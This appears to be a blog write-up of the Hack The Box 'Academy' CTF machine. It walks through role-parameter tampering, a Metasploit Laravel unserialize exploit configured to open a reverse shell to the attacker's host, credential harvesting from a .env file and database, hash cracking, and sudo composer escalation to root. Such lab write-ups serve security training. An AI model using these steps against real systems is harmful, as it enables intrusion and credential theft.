In this blog post, I'll share my experience tackling the "Academy" machine on Hack The Box. This Capture the Flag (CTF) challenge, created by egre55 and mrb3n, involves exploiting a web application's vulnerabilities to gain initial access and escalating privileges to obtain root access.
The primary vulnerabilities exploited in this challenge include:
Parameter Tampering: The web application allows users to manipulate parameters during registration, enabling unauthorized access to administrative functionalities.
Unserialized Remote Code Execution (RCE): The application uses the Laravel PHP framework with an exposed APP_KEY, which can be exploited to achieve remote code execution through object unserialization.
Weak Password Storage: User credentials are stored in a database with weak hashing mechanisms, making them susceptible to cracking.
Insecure Sudo Permissions: Certain binaries, such as composer, can be executed with elevated privileges without requiring a password, facilitating privilege escalation.
These vulnerabilities highlight the importance of implementing proper input validation, securing sensitive application keys, using strong password hashing algorithms, and carefully configuring sudo permissions to prevent unauthorized access and privilege escalation.
I began by performing an Nmap scan to identify open ports and services on the target machine. The scan revealed that port 80 (HTTP) was open, and the service attempted to redirect to http://academy.htb/. To access this domain, I added an entry to my /etc/hosts file.
Upon accessing http://academy.htb in my browser, I found a registration page. Using Burp Suite to intercept the registration request, I noticed a parameter named roleid with a default value of 0. I modified this value to 1 to test for elevated privileges.
After registering with roleid=1, I gained access to an admin panel. Further directory brute-forcing using dirb revealed an admin.php page, which displayed a hostname: dev-staging-01.academy.htb. I added this hostname to my /etc/hosts file.
Accessing http://dev-staging-01.academy.htb resulted in an internal server error, but the response headers indicated that the application was using the Laravel framework. Inspecting the page source revealed an APP_KEY in base64 format.
I searched for Laravel exploits using searchsploit and found an unserialize RCE exploit available in Metasploit. I configured the exploit with the target's IP address, the extracted APP_KEY, and the virtual host dev-staging-01.academy.htb:
use exploit/unix/http/laravel_token_unserialize_exec
set rhosts 10.129.106.234
set lhost <your_ip>
set APP_KEY <extracted_app_key>
set vhost dev-staging-01.academy.htb
exploit
This provided a shell as the www-data user.
Within the web directory, I found a .env file containing database credentials. Using these credentials, I accessed the MySQL database and retrieved user hashes. I cracked the hash for the user cry0l1t3 using john and logged in as this user, obtaining the user flag.
To escalate privileges, I uploaded and executed LinPEAS for enumeration. I discovered logs containing credentials for the user mrb3n. After logging in as mrb3n, I checked sudo permissions and found that composer could be run as root without a password. I exploited this misconfiguration to spawn a root shell and obtained the root flag.